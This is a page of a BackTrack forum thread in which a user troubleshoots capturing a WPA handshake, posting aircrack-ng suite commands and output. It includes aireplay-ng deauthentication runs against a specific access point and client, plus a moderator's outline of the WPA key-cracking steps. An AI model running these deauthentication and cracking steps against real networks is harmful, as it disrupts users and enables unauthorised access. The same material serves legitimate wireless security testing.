Page 2 of 8 FirstFirst 1234 ... LastLast
Results 11 to 20 of 77

Thread: Still have problem capturing WPA handshake

  1. #11
    Junior Member
    Join Date
    Jan 2009
    Posts
    59

    Default

    I am using BT3 with linux kernel 2.6.21.5
    Should I upgrade the kernel or not?
    There are only zd1211rw_inject_2.6.26.patch and zd1211rw_inject_2.6.23.patch
    What should I do next?

  2. #12
    Member cr1spyj0nes's Avatar
    Join Date
    Sep 2008
    Posts
    164

    Default

    why not ugrade to bt4 have you try'd to inject on bt4 easy way to see is boot up and login, open term type airmon-ng start eth1 and then aireplay-ng --test your monitor interface (--test) basicly test's injection

  3. #13
    Junior Member
    Join Date
    Jan 2009
    Posts
    59

    Default

    Code:
    aireplay-ng --test mon0
    For information, no action required: Using gettimeofday() instead of /dev/rtc
    03:24:02  Trying broadcast probe requests...
    03:24:04  No Answer...
    03:24:04  Found 0 APs
    The interface changes to mon0 when it enters the monitor mode

    Code:
    airmon-ng start wlan0 (Not eth1 anymore in BT4...)
    
    Found 1 processes that could cause trouble.
    If airodumo-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them!
    
    -e
    PID                 Name
    5330               Knetworkmanager
    
    Interface                 Chipset                     Driver
    wlan0                      ZyDAS 1211              zd1211rw - [phy0]
                                                                (monitor mode enabled on mon0)
    I am running both BT3 and BT4 beta using VMWare. Is there any impact on this?

    Even I test the injection both in BT3 and BT4 beta... None of them work... T.T
    Is there something wrong with my wireless USB adaptor...?

    Even I test the injection both in BT3 and BT4 beta... None of them work... T.T
    Is there something wrong with my wireless USB adaptor...?

  4. #14
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by charlescywong View Post
    Even I test the injection both in BT3 and BT4 beta... None of them work... T.T
    Is there something wrong with my wireless USB adaptor...?
    1st please do not double post/
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  5. #15
    Junior Member
    Join Date
    Jan 2009
    Posts
    59

    Default

    I have read the following post that indicate the Hawking HWU8DD rev. B can inject... But I still have problem on injecting...even the inject test is fail...
    hxxp://forums.remote-exploit.org/showthread.php?t=18309&highlight=injection+HWU8DD

    Do I need to make a fake authentication to the AP first before I de-authenticate the client ot vice versa?
    and
    Do I need to associate with the AP before I do any injection?

  6. #16
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by charlescywong View Post
    I have read .... But I still have problem on injecting.
    The problem is obviously with your comprehension.

    Do I need to make a fake authentication to the AP first before I de-authenticate the client ot vice versa?
    and
    Do I need to associate with the AP before I do any injection?
    Since the title of this thread is in regards to wpa here are the basic steps
    Start the wireless interface in monitor mode on the specific AP channel
    Start airodump-ng on AP channel with filter for bssid to collect authentication handshake.
    Use aireplay-ng to deauthenticate the wireless client
    Run aircrack-ng to crack the pre-shared key using the authentication handshake
    Since you are having trouble with the capture itself why not have a look at
    this tutorial and follow it through.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  7. #17
    Junior Member
    Join Date
    Jan 2009
    Posts
    59

    Default

    Quote Originally Posted by archangel.amael View Post
    The problem is obviously with your comprehension.



    Since the title of this thread is in regards to wpa here are the basic steps
    Start the wireless interface in monitor mode on the specific AP channel
    Start airodump-ng on AP channel with filter for bssid to collect authentication handshake.
    Use aireplay-ng to deauthenticate the wireless client
    Run aircrack-ng to crack the pre-shared key using the authentication handshake
    Since you are having trouble with the capture itself why not have a look at
    this tutorial and follow it through.

    I have actually read through the tutorial from aircrack-ng website:
    "Tutorial: How to Crack WPA/WPA2" hxxp://www.aircrack-ng.org/doku.php?id=cracking_wpa
    And I follow it step by step...
    Just when I was doing "Step 3 - Use aireplay-ng to deauthenticate the wireless client", I cannot capture any handshakes, No matter how many time I try to send deauth message to the AP and client...

  8. #18
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by charlescywong View Post
    I have actually read through the tutorial from aircrack-ng website:
    "Tutorial: How to Crack WPA/WPA2" hxxp://www.aircrack-ng.org/doku.php?id=cracking_wpa
    And I follow it step by step...
    Just when I was doing "Step 3 - Use aireplay-ng to deauthenticate the wireless client", I cannot capture any handshakes, No matter how many time I try to send deauth message to the AP and client...
    can we have your commands and actual output?
    Please copy them directly from the console.
    thanks

  9. #19
    Junior Member
    Join Date
    Jan 2009
    Posts
    59

    Default

    Code:
    bt ~ # airmon-ng stop eth1
    
    
    Interface       Chipset         Driver
    
    eth1            ZyDAS 1211      zd1211rw (monitor mode disabled)
    
    bt ~ # airmon-ng start eth1 4
    
    
    Found 1 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    
    PID     Name
    3520    dhcpcd
    
    
    Interface       Chipset         Driver
    
    eth1            ZyDAS 1211      zd1211rw (monitor mode enabled)
    
    
    bt ~ # iwconfig
    lo        no wireless extensions.
    
    eth0      no wireless extensions.
    
    eth1      IEEE 802.11b/g  ESSID:off/any  Nickname:"zd1211"
              Mode:Monitor  Frequency:2.472 GHz  Access Point: Invalid
              Bit Rate=1 Mb/s
              Encryption key:off
              Link Quality:0  Signal level:0  Noise level:0
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:0  Invalid misc:0   Missed beacon:0
    
    bt ~ # airodump-ng -c 4 --bssid 00:11:6B:18:EB:F6 -w wpa20090315 eth1
    
    (Than it starts capturing packet.....)
    
    bt ~ # aireplay-ng -0 10 -a 00:11:6B:18:EB:F6 -c 00:16:EA:C8:27:30 eth1
    06:08:58  Waiting for beacon frame (BSSID: 00:11:6B:18:EB:F6) on channel 13
    06:08:58  eth1 is on channel 13, but the AP uses channel 4
    bt ~ # aireplay-ng -0 10 -a 00:11:6B:18:EB:F6 -c 00:16:EA:C8:27:30 eth1
    06:09:02  Waiting for beacon frame (BSSID: 00:11:6B:18:EB:F6) on channel 4
    06:09:03  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 0 ACKs]
    06:09:04  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 0| 0 ACKs]
    06:09:05  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 0| 0 ACKs]
    06:09:06  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 6| 2 ACKs]
    06:09:07  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 0| 0 ACKs]
    06:09:08  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 0 ACKs]
    06:09:09  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 0 ACKs]
    06:09:11  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 0 ACKs]
    06:09:11  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 0| 0 ACKs]
    06:09:12  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 0 ACKs]
    bt ~ #
    I can't capture any handshake...>.< Why?

  10. #20
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Give the full output of:

    airodump-ng -c 4 --bssid 00:11:6B:18:EB:F6 -w wpa20090315 eth1

    (Than it starts capturing packet.....)


    I can clearly see that your deauth is not working

Page 2 of 8 FirstFirst 1234 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •